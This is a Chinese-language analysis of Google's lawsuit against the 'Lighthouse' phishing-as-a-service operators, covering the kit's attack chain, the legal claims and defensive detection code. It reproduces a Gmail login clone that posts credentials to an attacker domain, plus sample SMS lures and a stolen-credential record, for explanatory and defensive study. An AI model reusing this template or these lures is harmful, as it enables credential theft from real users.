
摘要
2025年11月,Google在美国联邦法院对25名据信位于中国的匿名被告提起民事诉讼,指控其运营名为“Lighthouse”的即服务型钓鱼工具(Phishing-as-a-Service, PhaaS),大规模冒用包括Google、USPS、E‑ZPass等在内的400余家机构品牌,通过伪造短信诱导用户访问仿冒网站,窃取信用卡信息与账户凭证。本文基于公开法律文书与网络安全研究数据,系统分析Lighthouse钓鱼套件的技术架构、攻击链路、社会工程策略及其跨境执法困境。结合Google所援引的《反诈骗腐败组织集团法》(RICO)、《兰哈姆法案》及《计算机欺诈与滥用法》,探讨科技企业以民事诉讼手段干预网络犯罪基础设施的可行性边界。技术层面,本文复现典型钓鱼模板生成逻辑,提出基于正则表达式与域名信誉的检测规则,并讨论零信任原则在短信通道防御中的落地路径。研究表明,尽管单次法律行动难以根除分布式犯罪生态,但通过司法禁令联动域名注册商、云服务商实施资产冻结,可有效提升攻击成本,为后续政策协同提供实证基础。
关键词:钓鱼即服务;Lighthouse;Google诉讼;短信钓鱼;跨境网络犯罪;零信任安全
1 引言
近年来,网络钓鱼攻击呈现高度产业化与模块化趋势。传统依赖手工构建虚假页面的攻击模式,已逐步被“钓鱼即服务”(Phishing-as-a-Service, PhaaS)平台取代。此类平台提供模板库、域名自动注册、后端数据收集接口及支付分账机制,使不具备技术背景的犯罪分子亦能发起高仿真度的钓鱼活动。2025年11月12日,Google向美国北加州联邦地区法院提交诉状,指控25名匿名中国籍个体运营名为“Lighthouse”的PhaaS平台,涉嫌窃取超1.15亿条美国信用卡记录,并未经授权使用Google商标实施大规模身份冒充。
此事件并非孤立。自2023年起,Google已多次针对中国境内的恶意软件分发网络与钓鱼基础设施发起法律行动,包括2024年7月对BadBox 2.0僵尸网络运营者的起诉。然而,受限于中美司法协作机制的缺失,此类诉讼的实际执行效力长期存疑。本文聚焦Lighthouse事件,旨在回答三个核心问题:(1)Lighthouse的技术实现如何支撑其“钓鱼民主化”能力?(2)Google援引的法律框架在跨境网络犯罪治理中具有何种功能与局限?(3)从防御视角,组织应如何重构短信通道的安全策略以应对PhaaS威胁?
本文结构如下:第二部分梳理Lighthouse的运作机制与攻击特征;第三部分解析诉讼所依据的法律条款及其适用逻辑;第四部分提出可落地的技术检测与防御方案,含代码示例;第五部分讨论法律与技术协同的现实挑战;第六部分总结研究发现。

2 Lighthouse钓鱼套件的技术架构与攻击链路
根据Google提交的诉状及Silent Push安全公司的独立研究,Lighthouse是一个典型的SaaS化钓鱼平台。其核心功能包括:预置模板库、自动化域名部署、受害者数据回传接口及订阅制计费系统。攻击者每月支付费用后,即可通过Web控制面板选择目标品牌(如Gmail、YouTube、USPS),一键生成高仿登录页,并自动绑定新注册域名。
2.1 模板生成与品牌冒用
Lighthouse内置超过600个钓鱼模板,覆盖400余家机构。其中116个直接嵌入Google旗下服务(Gmail、Google Play、YouTube)的官方Logo与UI元素。模板采用静态HTML+CSS+JavaScript构建,关键字段(如表单action地址、隐藏token)由后端动态注入。例如,一个典型的Gmail钓鱼页包含以下特征:
<!-- 简化版Lighthouse生成的Gmail钓鱼模板 -->
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Sign in - Google Accounts</title>
<link rel="icon" href="https://ssl.gstatic.com/accounts/ui/favicon.ico">
<style>
/* 复刻Google官方登录页样式 */
body { font-family: Roboto, Arial, sans-serif; background: #fff; }
.login-card { width: 300px; margin: 100px auto; padding: 20px; border: 1px solid #ddd; }
input[type="email"], input[type="password"] {
width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc;
}
</style>
</head>
<body>
<div>
<img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png" alt="Google" width="70">
<form action="https://collected-data[.]xyz/submit.php" method="POST">
<input type="hidden" name="brand" value="gmail">
<input type="email" name="email" placeholder="Email or phone" required>
<input type="password" name="password" placeholder="Password" required>
<button type="submit">Next</button>
</form>
</div>
</body>
</html>
该页面通过加载Google官方CDN资源(如favicon、logo)增强可信度,但表单提交地址指向攻击者控制的第三方域名(如collected-data[.]xyz)。此类域名通常通过自动化脚本批量注册,生命周期极短。

2.2 社会工程诱饵与传播渠道
Lighthouse攻击主要依赖短信作为初始接触媒介。典型话术包括:
“您的包裹因地址不详被滞留,请立即更新信息:[短链]”
“E‑ZPass账户存在未缴通行费$89.50,点击处理:[短链]”
“Google账户异常登录,请验证身份:[短链]”
这些短信常伪装成USPS、州交通部门或Google官方通知,利用紧迫感诱导点击。短链服务(如bit.ly、rebrandly)被广泛用于隐藏真实钓鱼URL,规避传统URL黑名单检测。
据Silent Push统计,在20天内,Lighthouse用户创建超20万个钓鱼站点,波及121国逾百万受害者。每个站点平均存活时间不足48小时,体现出“快打快撤”的运营策略。
2.3 数据收集与变现
受害者提交的凭证通过POST请求发送至Lighthouse后端API。数据结构通常如下:
{
"brand": "gmail",
"email": "victim@example.com",
"password": "P@ssw0rd123",
"ip": "203.0.113.45",
"ua": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X)",
"timestamp": "2025-11-10T14:23:01Z"
}
攻击者可通过控制面板实时查看捕获数据,并导出CSV格式用于二次售卖或直接实施账户接管(ATO)。部分高级套餐还提供Telegram机器人通知功能,实现“凭证到手即告警”。
3 法律框架与诉讼策略分析
Google此次诉讼援引三项联邦法律:《反诈骗腐败组织集团法》(RICO)、《兰哈姆法案》(Lanham Act)及《计算机欺诈与滥用法》(CFAA)。三者构成“技术侵权+商标盗用+有组织犯罪”的复合指控逻辑。
3.1 RICO法案的适用性
RICO原用于打击黑手党等有组织犯罪,但其第1962(c)条明确禁止“任何受雇于或参与影响州际或对外贸易的企业,通过敲诈勒索模式进行非法活动”。Google主张Lighthouse运营者构成“企业实体”,其持续性钓鱼行为属于“敲诈勒索模式”,且通过互联网影响跨州商业(如窃取信用卡信息用于在线消费)。尽管被告身处境外,但只要其行为对美国境内造成实质性损害,法院即可主张管辖权。
3.2 商标侵权与消费者混淆
《兰哈姆法案》第43(a)条禁止“在商业中使用任何可能引起混淆、误认或欺骗的虚假标识”。Google指出,Lighthouse模板未经授权使用其商标(如Gmail红白配色、YouTube播放按钮图标),导致用户误信网站合法性,构成直接侵权。此外,攻击行为损害Google品牌声誉,属于“间接损害”。
3.3 CFAA下的未经授权访问
CFAA第1030(a)(2)条禁止“故意未经授权访问计算机并获取信息”。Google虽非钓鱼网站服务器所有者,但主张攻击者通过伪造Google服务界面,“诱使用户授权”其访问本应受保护的账户信息,构成“间接未经授权访问”。此解释尚存争议,但已有判例支持(如Facebook v. Power Ventures)。
诉讼核心诉求包括:(1)永久禁令禁止被告使用Google商标;(2)命令域名注册商转移涉案域名;(3)冻结与钓鱼活动相关的支付账户;(4)赔偿经济损失。值得注意的是,Google并未要求刑事处罚——因其明知被告不可能出庭,而是聚焦于“资产剥离”与“基础设施拆除”。
4 技术防御体系构建
面对PhaaS的快速迭代,传统基于签名的防护已失效。需结合上下文感知、行为分析与策略收敛构建纵深防御。
4.1 钓鱼域名检测规则
基于Lighthouse域名特征(短生命周期、非常规TLD、无WHOIS隐私保护),可设计如下正则规则:
import re
from datetime import datetime, timedelta
def is_suspicious_domain(domain):
# 规则1:包含常见品牌关键词但非官方域名
brand_keywords = ['google', 'gmail', 'youtube', 'usps', 'ezpass']
if any(kw in domain.lower() for kw in brand_keywords) and not domain.endswith('.google.com'):
return True
# 规则2:域名长度异常短或含随机字符串
if len(domain) < 8 or re.search(r'[0-9]{4,}', domain):
return True
# 规则3:使用高风险TLD(如.xyz, .top, .club)
high_risk_tlds = ['.xyz', '.top', '.club', '.online', '.site']
if any(domain.endswith(tld) for tld in high_risk_tlds):
return True
return False
# 示例
print(is_suspicious_domain("gmail-verify.xyz")) # True
print(is_suspicious_domain("accounts.google.com")) # False
该函数可集成至邮件网关或DNS过滤系统,实现初步筛查。
4.2 短信内容语义分析
针对钓鱼短信,可构建关键词+上下文匹配模型:
def detect_phish_sms(text):
urgent_phrases = ['immediately', 'urgent', 'act now', 'within 24 hours']
brand_names = ['USPS', 'E-ZPass', 'Google', 'FedEx']
action_verbs = ['click', 'verify', 'update', 'resolve']
text_lower = text.lower()
# 检查是否同时包含品牌名、紧急词和动作指令
has_brand = any(b.lower() in text_lower for b in brand_names)
has_urgent = any(p in text_lower for p in urgent_phrases)
has_action = any(v in text_lower for v in action_verbs)
has_link = 'http' in text or '://' in text or 'bit.ly' in text
return has_brand and has_urgent and has_action and has_link
# 测试
sms1 = "USPS: Your package is stuck! Click here to update address: bit.ly/3xYz9A"
print(detect_phish_sms(sms1)) # True
企业可将此类规则部署于短信网关,对高风险消息实施拦截或重定向至安全团队审核。
4.3 零信任原则在短信通道的应用
传统安全模型默认内部通信可信,但PhaaS证明外部短信不可信。建议实施以下策略:
官方App内消息替代短信:关键通知(如账户异常、包裹状态)仅通过已认证的官方App推送,避免依赖SMS。
短链展开与信誉检查:在用户点击前,由中间代理展开短链并查询VirusTotal、Google Safe Browsing API。
多因素认证绑定设备:即使密码泄露,攻击者无法绕过FIDO2安全密钥或生物识别验证。
5 法律与技术协同的现实挑战
尽管Google的诉讼具有创新性,但其效果受限于结构性障碍。
首先,管辖权与执行难题。25名被告均以“John Doe”匿名起诉,实际身份不明。即便法院颁布禁令,中国法院无义务承认美国判决,域名注册商(如Namecheap、GoDaddy)虽可配合冻结,但攻击者可迅速切换至俄罗斯或东南亚注册商。
其次,PhaaS的弹性架构。Lighthouse采用去中心化C2设计,前端模板与后端数据收集分离。即使主控面板被查封,攻击者仍可手动部署静态页面至GitHub Pages或Cloudflare Workers,维持基础功能。
再者,立法滞后于技术演进。当前美国反诈法案(如GUARD Act)聚焦区块链追踪与机器人电话,对PhaaS缺乏针对性条款。Google所推动的《诈骗园区问责与动员法案》虽具前瞻性,但尚未生效。
因此,单一法律行动难以根除威胁,需形成“技术检测—证据固定—司法禁令—政策倡导”闭环。例如,Google与Human Security合作识别C2服务器,再以此作为诉讼证据,进而推动国会立法,构成良性循环。
6 结论
Google对Lighthouse运营者的诉讼,标志着科技巨头从被动防御转向主动司法干预。技术上,Lighthouse通过模板化、自动化与短链隐蔽,实现了钓鱼攻击的规模化复制;法律上,Google巧妙组合RICO、兰哈姆法案与CFAA,试图切断其基础设施与经济链条。尽管跨境执行存在天然障碍,但此类行动提升了犯罪成本,并为行业提供了可复用的IOC(如域名模式、短信话术)与防御范式。
未来防御不应仅依赖终端用户警惕,而需将零信任理念延伸至通信通道层:默认所有外部短信为不可信,强制通过已验证App交互;安全团队应建立动态钓鱼特征库,结合正则规则与机器学习实现近实时阻断。同时,政策制定者需加快针对PhaaS的专项立法,授权执法机构跨境冻结虚拟资产。唯有技术、法律与政策三轨并进,方能有效遏制“钓鱼民主化”浪潮。
编辑:芦笛(公共互联网反网络钓鱼工作组)
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。